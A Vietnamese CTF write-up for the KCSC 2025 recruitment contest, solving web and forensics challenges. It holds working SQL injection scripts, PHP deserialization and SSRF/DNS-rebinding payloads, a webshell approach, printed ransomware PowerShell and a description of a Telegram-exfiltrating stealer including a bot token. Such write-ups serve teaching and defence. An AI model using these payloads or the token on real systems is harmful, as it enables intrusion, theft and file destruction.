KCSC's things

Write Up Tuyển Thành Viên KCSC 2025

Kim Ngọc — Sat, 08 Nov 2025 10:31:27 GMT

I. Web

Cre: dunvu0

Check member


if(isset($_GET['name'])){
    $name = $_GET['name'];
    if(substr_count($name,'(') > 1){
        die('Dont :(');
    }
    $mysqli = new mysqli("mysql-db", "kcsc", "kcsc", "ctf", 3306);

    $result = $mysqli->query("SELECT 1 FROM members WHERE name = '$name'")->fetch_assoc();
    if($result){
        echo 'Found :)';
    } else {
        echo "Not found :(";
    }
    $mysqli->close();
    die();
}
?>

Ở challenge này dễ thấy được có bug SQL injection tại biến $_GET['name']

Cụ thể trang web thực hiện lệnh truy vấn SELECT 1 FROM members WHERE name = '$name' - nếu câu truy vấn có kết quả thì trang web trả về chuỗi Found :), và ngược lại

-> Đây là dạng blind boolean-based sqli.

Bình thường mình sẽ dùng những hàm như substring(), mid()... để extract từng ký tự

Tuy nhiên bài này filter ký tự ( khiến việc sử dụng nhiều hàm gặp khó khăn:

    if(substr_count($name,'(') > 1){
        die('Dont :(');
    }

-> Mình sử dụng các toán tử REGEXP, LIKE... để bypass

Và ở câu lệnh sql trên đang thực hiện truy vấn trên bảng members - mà flag mình cần thì ở bảng secrets nên mình cần phải tìm cách để control được điều kiện trả về đúng/sai của lệnh sql

Điều kiện đúng:

mysql>  SELECT 1 FROM members WHERE name = 'foo'  or not (select flag from secrets where flag like 'kcsc{%');
+---+
| 1 |
+---+
| 1 |
| 1 |
| 1 |
| 1 |
| 1 |
| 1 |
| 1 |
+---+
7 rows in set (0.00 sec)

Câu subquery là kiểu string và kết hợp với toán tử NOT thì

mysql> select not 'blabla';
+--------------+
| not 'blabla' |
+--------------+
|            1 |
+--------------+
1 row in set, 1 warning (0.00 sec)

-> NOT 'blabla' tương đương với True

Điều kiện sai:

mysql>  SELECT 1 FROM members WHERE name = 'foo'  or not (select flag from secrets where flag like 'lmao%');

Empty set (0.00 sec)

Câu subquery khi không trả về kết quả sẽ tương đương với NULL

Nhưng NOT NULL vẫn là NULL

      mysql> SELECT NOT NULL;
              -> NULL

Payload:

GET index.php?name=foo'  or not (select flag from secrets where flag like 'kcsc{%')`

solve.py

import requests, string

burp0_url = "http://36.50.177.41:40009/index.php"
burp0_cookies = {"PHPSESSID": "2a84b16a4971c0c06a98bb48e6ce7e39"}

flag = "kcsc{"
charsets = string.ascii_letters + string.digits + "_{}" 

while True:
    for char in charsets:
        payload =  { "name" : f"foo' or not (select flag from secrets where flag like '{flag + char}%')-- -"}
        r = requests.get(burp0_url, cookies=burp0_cookies, params=payload)

        if r.text.find("Found :)") != -1:
            flag += char
            print(flag)
            break

Flag: KCSC{sql_injection_that_de_dung_khong_nao}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    @$data = json_decode(file_get_contents("php://input"));
    $username = $data->{'username'} ?? '';
    $password = $data->{'password'} ?? '';

    if (!isset($users[$username])) {
        $error = "User not found!!!";
        echo json_encode(['error' => $error]);
        exit;
    } elseif ($users[$username] == $password) {
        $_SESSION['user'] = $username; 
        echo json_encode(['success' => true, 'redirect' => '?dashboard']);
        exit;
    } else {
        $error = "Incorrect password!!!";
        echo json_encode(['error' => $error]);
        exit;
    }
}

Có bug Loose comparision ở biến password

'aaa' == 0



if('aaa' == 0){
    echo "YES";
}
else {
    echo "NOPE";
}
// YESS

intercept rồi sửa request với credential {"username":"admin","password": 0 }

Flag: KCSC{u_are_admin<333333333}

write_by_chatgpt

Để lấy được flag ta cần phải login thành công.

Có lỗi ở tính năng reset password

app.post('/reset-password-request', (req, res) => {
    const username = String(req.body.username);

    const sql = `SELECT * FROM users WHERE username = ?`;
    db.get(sql, [username], (err, user) => {
        if (err || !user) {
            return res.status(400).send('User not found');
        }

        const resetToken = jwt.sign({ id: user.id, username: user.username }, JWT_SECRET, { expiresIn: '10m' });

        const resetLink = `http://localhost:${PORT}/reset-password/${resetToken}`;

        //In construction
        res.send('Password reset link sent to your email');
        res.send(resetLink);

    });
});

app.post('/reset-password/:token', (req, res) => {
    const { token } = req.params;
    const newPassword = String(req.body.newPassword);

    if(!uuidRegex.test(newPassword)) return res.status(400).send("Invalid new password")
    jwt.verify(token, JWT_SECRET, (err, decoded) => {
        if (err) {
            return res.status(400).send('Invalid or expired reset token');
        }

        bcrypt.hash(newPassword, 10, (err, hashedPassword) => {
            if (err) {
                return res.status(500).send('Error hashing password');
            }

            const sql = `UPDATE users SET password = ? WHERE id = ?`;
            db.run(sql, [hashedPassword, decoded.id], function (err) {
                if (err) {
                    return res.status(500).send('Error updating password');
                }
                res.send('Password successfully reset');
            });
        });
    });
});

Nó chỉ verify jwt token BẤT KÌ có hợp lệ hay không thay vì verify resetToken

-> Vậy mình có tái sử dụng token cũ được tạo lúc register để reset password

Exploit

Tạo một pw bất kỳ thỏa mãn hàm uuidRegex(): 123e4567-e89b-12d3-a456-426614174000
Tiếp tục request tới /reset-password/:token
Login với credential dunvu0:123e4567-e89b-12d3-a456-426614174000 lấy flag

Flag: KCSC{alternative_for_view_src_html_warmup_challenge}

yugioh_shop

Để lấy flag ta cần mua đủ bộ 5 lá bài "Exodia"

Tính năng /buy và /sell sử dụng quá nhiều lệnh truy vấn sql tới database để kiểm tra trạng thái user => khả năng có lỗi race condition ở đây

@app.route("/sell/")
def sell(item_id):
    if "user_id" not in session:
        return redirect("/login")
    user = query_db("SELECT * FROM users WHERE id = ?", [session["user_id"]], one=True)
    transaction = query_db("SELECT * FROM transactions WHERE user_id = ? AND item_id = ?", [user[0], item_id], one=True)
    if transaction:
        item = query_db("SELECT * FROM items WHERE id = ?", [item_id], one=True)
        query_db("DELETE FROM transactions WHERE id = ?", [transaction[0]])
        query_db("UPDATE users SET balance = balance + ? WHERE id = ?", [item[2], user[0]])
        flash(f"You sold {item[1]}!", "success")
    else:
        flash("You don't own this item.", "danger")
    return redirect("/")

Vì được cấp sẵn 100k để mua 1 lá bài, mình sẽ sử dụng burp intruder để tiến hành bán liên tục.

Gửi request với null payload option, max_concurrent_request tầm 50

-> Confirm có lỗi, số dư của mình đã tăng

Mình lặp lại thao tác mua bán thêm vài lần cho tới khi đủ tiền mua đủ bộ 5 lá

Truy cập /exodia and get flag

Flag: KCSC{easy_challenge_but_the vuln_isnt_popular_with_newbies}

final mission

Sau khi tạo tài khoản và đăng nhập, ta được redirect đến /admin.php nhưng gặp lỗi 403 access denied

Ở chall này flag có hai phần, trước hết mình phải khai thác sqli để lấy được Part_1

Flag_1

admin.php


require 'db.php';
require 'utils.php';

session_start();

$stmt= $pdo->query("select * from secret");
$result = $stmt->fetch();
$tokenSecret = $_GET['secret'];
if (!isset($_SESSION['user'])||!isset($_COOKIE['Token'])||$result['secret_key']!==$tokenSecret) {
    die("Access denied!");
}

$user= $_COOKIE['Token'];

$userdata = unserialize(base64_decode($user));

?>

Để truy cập vào admin.php ta cần $secret_key

$secret_key được lưu trong database cùng với Flag_1

CREATE TABLE users (
    id INT AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(255) NOT NULL UNIQUE,
    password VARCHAR(255) NOT NULL
);

CREATE TABLE secret (
    id INT AUTO_INCREMENT PRIMARY KEY,
    secret_key VARCHAR(255) NOT NULL
);
CREATE TABLE flagggg (
    id INT AUTO_INCREMENT PRIMARY KEY,
    flag_1 VARCHAR(255) NOT NULL
);

INSERT INTO users (username,password) VALUES ('hoshino','PASS_TEST');
INSERT INTO secret (secret_key) VALUES ('SECRET_TEST');
INSERT INTO flagggg (flag_1) VALUES ('KCSC{part1');

search.php có vài điểm đáng lưu ý


require 'db.php';
session_start();

if (!isset($_SESSION['user'])) {
    die("Access denied!");
}
if(isset($_GET['search'])){
    $username = sprintf("%s", addslashes($_GET["search"]));
    $password= addslashes($_GET["search"]);
    $sql = sprintf("SELECT * FROM users WHERE username LIKE '$username' OR password LIKE '%s'", $password);

    $stmt= $pdo->query($sql);
    $result = $stmt->fetch();
    if ($result) {
        echo "'FOUND "
    } else {
        echo "Lỗi: Không tìm thấy thông tin nào phù hợp."
    }
}
?>

-> Ở biến $_GET["search"] dính lỗi sql injection, cụ thể:

$username và $password đều nhận giá trị từ param ?search= nhưng được xử lý khác nhau với hàm sprintf(), addslashes()

Ban đầu mình thử bypass hàm addslashes() với GBK encoding nhưng no hope...

Sau một hồi stuck mình chuyển hướng thử google về hàm sprintf() này:

Usage: %[argnum$] [flags] [width] [.precision]

Mình có thể format padding như: thêm ký tự padding thay thế bất kỳ

Và nếu padding là ký tự đặc biệt như \%&*...) thì phải có ký tự \ hoặc % đằng trước, vd: % -> \%

-> Có thể lợi dụng việc format string của sprintf() để escape hàm addslashes() -> sqli

payload: %1$\'

+ quote ' được addslash trở thành %1$\\ '

+ %: Bắt đầu format.

+ 1$: Sử dụng tham số đầu tiên. vì $sql = sprintf("SELECT ....LIKE '%s'", $password). "tham số đầu tiên" là password

+ \: Xác định ký tự padding là \

Format này vẫn chưa đúng, nhưng sprintf() hoạt động giống switch case -> khi format không xác định nó sẽ sử dụng giá trị mặc định

Câu lệnh sql khi được escaped:

SELECT * FROM users WHERE username LIKE ' Or........  ' Or 1=1;-- -%1$\''

Tham khảo:

Vậy là mình đã có thể inject vào câu query, tiến hành khai thác

exploit.py

import requests, string

burp0_url = "http://36.50.177.41:40010/admin.php"
burp0_cookies = {"PHPSESSID": "2a84b16a4971c0c06a98bb48e6ce7e39", "session": "eyJ1c2VyX2lkIjoyMTF9.Z43_uQ.aTEv5mbmgo5HyXPakyeeiWiyaaI", "Token": "Tzo0OiJVc2VyIjo0OntzOjg6InVzZXJuYW1lIjtzOjY6ImR1bnZ1byI7czoxMzoiAFVzZXIAaXNBZG1pbiI7TjtzOjg6InBhc3N3b3JkIjtzOjYwOiIkMnkkMTAkRXV1d0E1cDhLRnhxRjZCVi45TGNwdS81eDcucC9RQWVEbDJ4MDlKWUFoUmg5cndOZVdzRjIiO3M6MzoidXJsIjtOO30%3D"}

charset = string.ascii_letters + string.digits + "_{}"
flag = ""

# find length
for i in range(1, 100):
    payload = f"?search=or+(select+length(flag_1)={i}+from+flagggg)%3b--+-%1$"
    r = requests.get(burp0_url + payload, headers=burp0_headers, cookies=burp0_cookies)

    if r.text.find("FOUND") != -1:
        length = i
        print(f"password length is: {length}")
        break


# find password
for offset in range(1, length + 1):
    print(f"round: {offset}")
    for i in charset[::-1]:
        payload = f"?search=or+(select+substr(flag_1,{offset},1)=char({ord(i)})+from+flagggg)%3b--+-%251$\\"
        r = requests.get(burp0_url + payload, headers=burp0_headers, cookies=burp0_cookies)
        if r.text.find("FOUND") != -1:
            flag+= i
            print(flag)
            break

print(f"flag is: {flag}")

Part_1: KCSC{cu_ph4i_g01_l4

Flag_2

Kèm với flag_1 ta lấy luôn password của user tên hoshino và secret_key

password: doilathethoi
secret_key: chang_biet_da_bao_lau_roi_minh_khong_co_nhau

Trở lại với admin.php:

if (!isset($_SESSION['user'])||!isset($_COOKIE['Token'])||$result['secret_key']!==$tokenSecret) {
    die("Access denied!");
}

kiểm tra xem session của user có tồn tại hay không, cookie có Token và có cung cấp secret key hay không, nếu có thì sẽ unserialize token cookie.

-> Vì nó có sử dụng hàm unserialize() -> khả năng có lỗi php deserialize ở đây.

Tại utils.php có định nghĩa Class User và một số magic method:

 
class User
{
    public $username;
    private $isAdmin;
    public $password;
    public $url;

    // Constructor
    public function __construct($username = "", $password = "", $url = "")
    {
        $this->username = $username;
        $this->password = $password;
        $this->url = $url;
    }
    public function __wakeup(){
        if($this->username === "hoshino" ){
            $this->username="You are not hoshino";
        }
        switch($this->username){
            case "hoshino":
                $this->isAdmin=1;
                break;
            default:
                $this->isAdmin=0;
        }
    }
    public function __destruct(){
        if($this->isAdmin){
            $content='safe';
            $result = parse_url($this->url);
            var_dump($result);
            if($result['scheme']!=='http' && $result['scheme']!=='https'){
                $content="Not support this scheme";
            }
            if(isPrivateIP($result['host'])|| strlen($result['host'])<9){
                $content="Private IP not allowed or Length host too short";
            }
            if (strpos($result['host'], '[') !== false || strpos($result['host'], ']') !== false) {
                $content = "Host contains '[' or ']'.";
            }
            if($content==='safe'){
                $options = [
                    'http' => [
                        'follow_location' => 0
                    ]
                ];
                $context = stream_context_create($options);
                echo file_get_contents($this->url, false, $context);
            }else{
                echo $content;
            }
        }else{
            echo '
        
            Error: You are not admin.
        
    
';
        }
    }
}

__wakeup():
- Thay đổi giá trị của username nếu nó là "hoshino".
- Thiết lập giá trị cho thuộc tính isAdmin dựa trên giá trị của username.
__destruct():
- Kiểm tra xem người dùng có phải là admin hay không.
- Nếu là admin, phân tích URL và kiểm tra tính hợp lệ của nó.
- Nếu URL hợp lệ, thực hiện yêu cầu HTTP và hiển thị nội dung.
- Nếu URL không hợp lệ hoặc người dùng không phải là admin, hiển thị thông báo lỗi tương ứng.

Chỉ hoshino có role admin nhưng ta không thể dùng mật khẩu thu được trước đó vì login.php sử dụng password_hash()

-> Có hai cách khác để lấy được role Admin ở đây:

Để ý __wakeup() sử dụng switch case để kiểm tra username

Hoặc ta trực tiếp sửa serialize data và thực hiện fast destruct để bỏ qua hàm __wakeup()
```
  a:2:{i:0;O:4:"User":4:{s:8:"username";s:6:"dunvuo";s:13:"�User�isAdmin";N;s:8:"password";s:3:"123";s:3:"url";s:0:"";}i:0;s:14:"useless string";}
```
- isAdmin là private property khi serialize có dạng \0ClassName\0, \0 là NULL bytes
- ref: https://blog.quarkslab.com/php-deserialization-attacks-and-a-new-gadget-chain-in-laravel.html
Hàm __destruct() kiểm tra role admin tiếp tục check tới url nếu thỏa mãn sẽ gọi tới file_get_contents()

            $content='safe';
            $result = parse_url($this->url);
            var_dump($result);
            if($result['scheme']!=='http' && $result['scheme']!=='https'){
                $content="Not support this scheme";
            }
            if(isPrivateIP($result['host'])|| strlen($result['host'])<9){
                $content="Private IP not allowed or Length host too short";
            }
            if (strpos($result['host'], '[') !== false || strpos($result['host'], ']') !== false) {
                $content = "Host contains '[' or ']'.";
            }
            if($content==='safe'){
                $options = [
                    'http' => [
                        'follow_location' => 0
                    ]
                ];
                $context = stream_context_create($options);
                echo file_get_contents($this->url, false, $context);

function isPrivateIP($input) {
    if (filter_var($input, FILTER_VALIDATE_IP)) {
        $ip = $input;
    } else {
        $ip = gethostbyname($input);
        if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
            return false;
        }
    }
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
        if ($ip === '127.0.0.1') {
            return true;
        }
        $privateRanges = [
            ['10.0.0.0', '10.255.255.255'],
            ['172.16.0.0', '172.31.255.255'],
            ['192.168.0.0', '192.168.255.255'],
        ];

        $ipLong = ip2long($ip);

        foreach ($privateRanges as [$start, $end]) {
            if ($ipLong >= ip2long($start) && $ipLong <= ip2long($end)) {
                return true;
            }
        }
    }
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6)) {
        if ($ip === '::1') {
            return true;
        }
        if (strpos($ip, 'fc') === 0 || strpos($ip, 'fd') === 0) {
            return true;
        }
    }
    return false;
}

Ta có thể tận dụng file_get_contents() đọc flag_2 tại flag_final.php


$ip = $_SERVER['REMOTE_ADDR'];
if ($ip === '127.0.0.1' || $ip === '::1' || $ip === 'localhost') {
    echo "Flag_part2: part2}";
} else {
    echo "Bạn không có quyền truy cập vào trang này.";
    exit;
}
?>

Kiểm tra và lấy địa chỉ IP:
- Sử dụng filter_var() với FILTER_VALIDATE_IP để kiểm tra xem $input có phải là địa chỉ IP hợp lệ hay không.
- Nếu $input không phải là địa chỉ IP hợp lệ, sử dụng gethostbyname() để lấy địa chỉ IP từ hostname.
- Nếu địa chỉ IP sau khi lấy từ hostname vẫn không hợp lệ, hàm trả về false.
Kiểm tra địa chỉ IPv4:
- Sử dụng filter_var() với FILTER_FLAG_IPV4 để kiểm tra xem địa chỉ IP có phải là IPv4 hay không.
- Nếu địa chỉ IP là 127.0.0.1, hàm trả về true.
- Chuyển đổi địa chỉ IP sang dạng số nguyên bằng ip2long(). Kiểm tra xem địa chỉ IP có nằm trong các dải địa chỉ IP riêng tư hay không.
Kiểm tra địa chỉ IPv6:
- Sử dụng filter_var() với FILTER_FLAG_IPV6 để kiểm tra xem địa chỉ IP có phải là IPv6 hay không.
- Nếu địa chỉ IP là ::1, hàm trả về true.
- Kiểm tra xem địa chỉ IP có bắt đầu bằng fc hoặc fd (địa chỉ IPv6 riêng tư) hay không.

Mục đích cuối cùng là một url truy cập tới http://localhost/flag_final.php để đọc flag

Mình tách đoạn xử lý filter url riêng ra để tiện test

Phần filter chỉ kiểm tra với giá trị "127.0.0.1" thay vì cả dải loopback ip 127.0.0.0/8 nên bất kỳ ip trong dải đều valid.
Ngoài ra với linux 0.0.0.0 cũng sẽ trỏ về localhost
Ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md#bypass-localhost-with-cidr

Đây không phải intended solution của tác giả, mình gặp may nên bypass phần ip này khá dễ dàng... tobe continued...

intended: sử dụng dns rebinding

Bởi hàm isPrivateIP() xử lý có thực hiện phân giải tên miền thành ip với gethostbyname(). sau đó lại file_get_content() với chính url đó.
Sử dụng tool _ tạo một domain có 2 lần thay đổi địa IP A, B. Khi hê thống phân giải tên miền lần đầu sẽ trỏ tới ip hợp lệ, nhưng lần phân giải thứ hai lại trỏ về localhost

Tham khảo: - https://cookiearena.org/penetration-testing/dns-rebinding-la-gi/ - https://www.youtube.com/watch?v=Xu519u5B-dM - https://danielmiessler.com/blog/dns-rebinding-explained - https://lock.cmpxchg8b.com/rebinder.html

Payload cuối cùng:

O:4:"User":4:{s:8:"username";i:0;s:13:"\0User\0isAdminN;s:8:"password";s:60:"$2y$10$EuuwA5p8KFxqF6BV.9Lcpu/5x7.p/QAeDl2x09JYAhRh9rwNeWsF2";s:3:"url";s:48:"http://01020304.c0a80001.rbndr.us/flag_final.php";}

Flag_2: D1n4N0c_K1Ch_Tr4n_B4y_Ph4p_Ph01} KCSC{Cu_Ph4i_G01_L4_D1n4_N0c_K1Ch_Tr4n_B4y_Ph4p_Ph01}

todo

Những bài sau mình không hoàn thành kịp trong thời gian diễn ra giải

Break

Ở bài này mình dễ dàng thấy được bug để đọc file flag tại route /home

Tuy nhiên ta cần có tài khoản admin để truy cập vào đường dẫn này...

Mình chuyển sang xem kỹ hơn tại tính năng register:

@app.route('/register', methods=['GET','POST'])
def register():
    if request.method == 'POST':
        try:
            if not request.data:
                return jsonify({"error": "No data provided"}), 200

            data = json.loads(request.data)
            username = data.get("username")
            password = data.get("password")

            m = re.search(r".*", username)
            if m.group().strip().find("admin") == 0:
                return jsonify({"message": "Invalid username"}), 200

            if not username or not password:
                return jsonify({"message": "Registration failed, missing fields"}), 200

            if len(password) < 8:
                return jsonify({"message": "Password must be at least 8 characters"}), 200

            user = User()
            user.username = username.strip()
            user.password = password.strip()
            Users.append(user)
            return jsonify({"message": "Registration successful"}), 200

Có thể thấy ở đây trang web đang cố chặn người dùng đăng ký tài khoản với username là admin. Cụ thể nó sử dụng regex .* để trích xuất toàn bộ input người dùng nhập vào sau đó kiểm tra nếu username bắt đầu với chuỗi "admin" thì sẽ trả lỗi.

            m = re.search(r".*", username)
            if m.group().strip().find("admin") == 0:
                return jsonify({"message": "Invalid username"}), 200

-> Ở đây có một vấn đề đó là: trang web thực hiện kiểm tra username trước rồi lại đi strip()

            user.username = username.strip()
            user.password = password.strip()

Thêm nữa dữ liệu input được xử lý bằng json.loads()

            data = json.loads(request.data)
            username = data.get("username")
            password = data.get("password")

Trong khi cách lấy POST data thường gặp là:

https://stackoverflow.com/questions/13279399/how-to-obtain-values-of-request-variables-using-python-and-flask

-> Những chuỗi như \r \n sẽ được chuyển thành ký tự xuống dòng thực sự thay vì là "raw string"

Lý do dùng \r\nadmin bypass thành công nhưng admin\r\n thì không: Đó là vì phần kiểm tra username sử dụng regex pattern .* -> mà theo docs nói:

(Dot.) In the default mode, this matches any character EXCEPT A NEWLINE

Khi đó biến m sẽ không match được bất kỳ input nào ta nhập vào. Vậy là mình đã có thể bypass và reg được account admin

Tiếp theo chỉ cần truy cập route /home và lấy flag:

GET /home?protocol=file&host=/flag.txt

giftcard

Flag được load vào biến môi trường

FLAG = os.environ.get("FLAG", "KCSC{FAKE_FLAG}")

@app.route("/card")
def render_card():
    sender = request.args.get("sender")
    receiver = request.args.get("receiver")

    card = Card(receiver, sender)
    card_content = request.args.get("card_content")

    xmas_card = "From: {card.sender}\r\nTo: {card.receiver}\r\n" + card_content
    xmas_card = xmas_card.format(card=card) 

    return render_template("card.html", xmas_card=xmas_card)

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

-> Lỗi tại đoạn ....format(card=card)

payload:

GET /card?card_content={card.__init__.__globals__['FLAG']}`:

-> Vì .format(card=card): không sử dụng {{}} vì {} trong trường hợp này đóng vai trò là placeholder của hàm format(), cần truyền object card vào đây.

XXD Service

Đây là một challenge black-box, trang web này cho phép người dùng upload một file bất kỳ, một điểm đáng chú ý là mặc dù tên file bị sửa random nhưng đuôi extension của file mình upload vẫn được giữ nguyên (.php)

-> Có thể RCE nếu mình có thể upload được file chứa webshell

Bên cạnh đó trang web cũng chặn một số từ khóa nguy hiểm và ta cần phải bypass

-> Bypass tag mở php với uppercase -> hàm system(), exec() thường dùng bị chặn -> ngoài ra có passthru() -> vậy payload tạm thời là


Tuy nhiên khi truy cập vào file "upload_abcabc.php" thì nhận thấy nội dung file đã bị thay đổi

-> Có vẻ ở phía backend đã thực hiện một số lệnh kiểu như:
xxd filename > uploads/user_/...chall.


The xxd command is a utility used in Unix-like operating systems to create a hexadecimal dump of a file or standard input. It can also perform the reverse operation, converting a hexadecimal dump back into its original binary form.

Kết quả là webshell mình tạo đã bị rối vào đống hexdump được tạo ra, php không thể thực thi vì lỗi cú pháp
-> Bypass với comment - /**/
Payload:

II. Forensics
Cre: trithong1906
HDSD

Step 1

Challenge cung cấp cho em file HDSD.ad1 nên em mở bằng FTK image.

Duyệt qua các folder thì dễ dàng thấy được folder Downloads có voucher mà đề bài đề cập đương nhiên nó bị mã hóa rồi.




Theo đề bài thì bạn M vô tình tải file mã độc, theo kinh nghiệm của em mấy bài liên quan đến tải mã độc hay liên quan đến trình duyệt lắm nên em điều tra mấy folder của trình duyệt.

Chỉ có 1 trình duyệt được sử dụng ở máy của nạn nhân là EDGE nếu điều tra bình thường thì sẽ không thấy được gì ở những folder của EDGE nhưng Windows 10 phiên bản 22H2 nên Microsoft Edge tích hợp chế độ IE để hỗ trợ các ứng dụng hoặc trang web cũ chỉ hoạt động trên Internet Explorer, đây là giải pháp thay thế chính thức và được Microsoft hỗ trợ lâu dài.

Vì thế em đã chuyển sang folder INetCache để điều tra và đã tìm được malware.



Sở dĩ em biết tìm ở folder INetCache vì năm 2020 ở giải của mấy anh Ấn độ cũng từng có challenge liên quan đến đường dẫn như vậy nhưng đó là trên windows cũ, và trong thực tế cũng có người bắt gặp malware nằm trong đường dẫn folder tương tự như vậy https://learn.microsoft.com/en-us/answers/questions/905889/malware-found-in-c-users(username)appdatalocalmicr
Step 2
Dùng cyberchef ta sẽ xem được đoạn mã thật sự

Nhưng nó bị obfuscator dùng powerdecode để deobfuscator
iEx ((('function XOR-String {    param([string]xlJInputString, [string]xlJKey)        xlJinputBytes = [System.Text.Encoding]::UTF8.GetBytes(xlJInputString)    xlJkeyBytes = [System.Text.Encoding]::UTF8.GetBytes(xlJKey)    xlJoutputBytes = @()        for (xlJi = 0; xlJi -lt xlJinputBytes.Length; xlJi++) {        xlJoutputBytes += xlJinputBytes[xlJi] -bxor xlJkeyBytes[xlJi % xlJkeyBytes.Length]    }    return [System.Text.Encoding]::UTF8.GetString(xlJoutputBytes)}xlJPCName = xlJenv:COMPUTERNAMExlJKey = XOR-String -InputString xlJPCName -Key 6zoUwU6zoxlJIV = XOR-String -InputString xlJPCName -Key 6zoXD6zoxlJkeyBytes = [System.Text.Encoding]::UTF8.GetBytes(xlJKey.PadRight(16).Substring(0,16))xlJivBytes = [System.Text.Encoding]::UTF8.GetBytes(xlJIV.PadRight(16).Substring(0,16))function Encrypt-File {    param([string]xlJInputFile, [string]xlJOutputFile)        xlJaes = [System.Security.Cryptography.Aes]::Create()    xlJaes.Key = xlJkeyBytes    xlJaes.IV = xlJivBytes    xlJencryptor = xlJaes.CreateEncryptor()    xlJinputBytes = [System.IO.File]::ReadAllBytes(xlJInputFile)    xlJencryptedBytes = xlJencryptor.TransformFinalBlock(xlJinputBytes, 0, xlJinputBytes.Length)    [System.IO.File]::WriteAllBytes(xlJOutputFile, xlJencryptedBytes)}Get-ChildItem -File -Recurse CiE ForEach-Object {    xlJinputFile = xlJ_.FullName    xlJoutputFile = 6zoxlJ(xlJ_.FullName).cucked6zo    Encrypt-File -InputFile xlJinputFile -OutputFile xlJoutputFile    if (xlJ_.Extension -ne 6zo.cucked6zo) {        Remove-Item -Path xlJinputFile -Force    }}')-cReplaCe  'xlJ','$'-RepLAce '6zo','"' -RepLAce  'CiE','|'))

Cả đoạn mã thực chất đang được nhúng trong chuỗi (bị xáo trộn) và được thực thi qua iEx.
Toàn bộ cơ chế:

Lấy tên máy tính để sinh ra Key và IV.

Duyệt toàn bộ các tệp.

Mã hóa bằng AES (với Key/IV đã sinh).

Xóa tệp gốc.

Thêm đuôi .cucked cho file mã hóa mới.


Step 3
Giờ thì bây giờ ta chỉ cần biết được tên máy tính thì sẽ giải mã được voucher Tên máy tính thì có thể dùng registry explorer xem ở hive file SYSTEM

Step 4
Dùng script để giải:
from Crypto.Cipher import AES

def xor_string(input_str, key_str):
    input_bytes = input_str.encode('utf-8')
    key_bytes = key_str.encode('utf-8')
    output = bytearray(input_bytes[i] ^ key_bytes[i % len(key_bytes)] for i in range(len(input_bytes)))
    return output.decode('utf-8', errors='ignore')

def derive_key_and_iv(pc_name):
    key_str = xor_string(pc_name, "UwU")
    iv_str = xor_string(pc_name, "XD")
    key_padded = (key_str + ' ' * 16)[:16]
    iv_padded = (iv_str + ' ' * 16)[:16]
    return key_padded.encode('utf-8'), iv_padded.encode('utf-8')

def decrypt_data(encrypted_data, key, iv):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(encrypted_data)
    pad_len = decrypted[-1]
    return decrypted[:-pad_len] if pad_len > 0 and pad_len <= 16 else decrypted

def main():
    PC_NAME = "DESKTOP-SH94VUS"
    key, iv = derive_key_and_iv(PC_NAME)
    in_file = "Voucher_hoc_bong_chuyen_auto_pass_mon.txt.cucked"

    with open(in_file, "rb") as f:
        encrypted_data = f.read()

    decrypted_data = decrypt_data(encrypted_data, key, iv)

    print(decrypted_data.decode('utf-8'))

if __name__ == "__main__":
    main()

Flag
KCSC{the^?_cha^'t_KMA_la`_nhung~_niem`_dau}

Note
Có lẽ đây là hướng unintended đúng ra là nên bắt đầu từ file HDSD.chm, giải nén nó ra sẽ có đường link như thế này để download file về:

Invitation

Step 1
Challenge cung cấp cho 2 file: 1 file pdf và 1 file .cmd, nhưng trong giải lúc giải nén em không để ý là giải nén ra nó bị trùng tên và bị mất file pdf thành ra em chỉ thấy được mỗi file .cmd .cmd và em cũng không biết nó là file gì, cat thì toàn kí tự không đọc được nên em strings ra để đọc được.
Khi strings thì sẽ thấy được 2 url và 1 vài đường dẫn khác.
Quan trọng là 2 url này: https://raw.githubusercontent.com/NVex0/Asset/main/WindowsUpdate

Còn url này để tải về file Snake.zip ở đó sẽ chứa file WindowsUpdate.py https://raw.githubusercontent.com/NVex0/Asset/main/Snake.zip
Step 2
WindowsUpdate.py cho thấy đây là một mã độc dạng stealers.

Chức năng chính:

Trích xuất thông tin nhạy cảm từ các trình duyệt web được cài đặt trên máy, bao gồm:

Dữ liệu đăng nhập: Tài khoản và mật khẩu.

Thông tin thẻ tín dụng.

Cookie.

Lịch sử duyệt web.

Tệp đã tải xuống.





Cách thức hoạt động:

Lấy khóa mã hóa từ trình duyệt (master key).

Giải mã dữ liệu nhạy cảm bằng cách sử dụng thuật toán AES.

Lưu trữ dữ liệu tại thư mục: C:\Users\Public\Snake\.

Exfiltrate qua API của Telegram đến tài khoản của hacker.



Kênh gửi dữ liệu:

API Telegram:
  https://api.telegram.org/bot/sendDocument


Chat ID: 5814016276 (ID của hacker).

Bot Token: 6685689576:AAEZDTUeHWzc7nqK84T7IhtBKJyZ0cUbIZo.






Step 3
Dựa trên đề bài có đề cập đến destination tức là ta sẽ tập chung khai thác đích đến của dữ liệu chính là Telegram
Ta cần biết thông tin sơ bộ của con bot telegram mà hacker gửi dữ liệu đến
Đọc bài viết này để tham khảo https://core.telegram.org/bots/api#getme
Từ bài viết ta có thể truy cập vào đường link sau đây để lấy thông tin: https://api.telegram.org/bot6685689576:AAEZDTUeHWzc7nqK84T7IhtBKJyZ0cUbIZo/getMe

Giải mã chuỗi base64 Qk9UOiBLQ1NDe0V4RjFsVHJhdGkwbl8wdjNyX1QzTDNnckBtP30= ta sẽ nhận được flag
Ở challenge của viblo và các giải của HTB cũng đề cập đến API Telegram kiểu này nhưng nó khó hơn rất nhiều.
Flag
KCSC{ExF1lTrati0n_0v3r_T3L3gr@m?}

Powershell 101

Step 1
Challenge cung cấp cho file s.ps1 và folder Pictures gồm các file bị mã hóa với đuôi .enc
Phân tích file s.ps1 thì ta thấy Script này:

Lấy tất cả file ảnh (định dạng .jpg, .png, .jpeg, .bmp) từ thư mục C:\Users\<...>\OneDrive\Pictures

Mã hoá dữ liệu file bằng AES CBC (với key và IV đã hardcode).

Base64 + Nén (Deflate) + Base64 lần nữa.

Ghi kết quả ra file có đuôi .enc.

Xoá file gốc.


Step 2
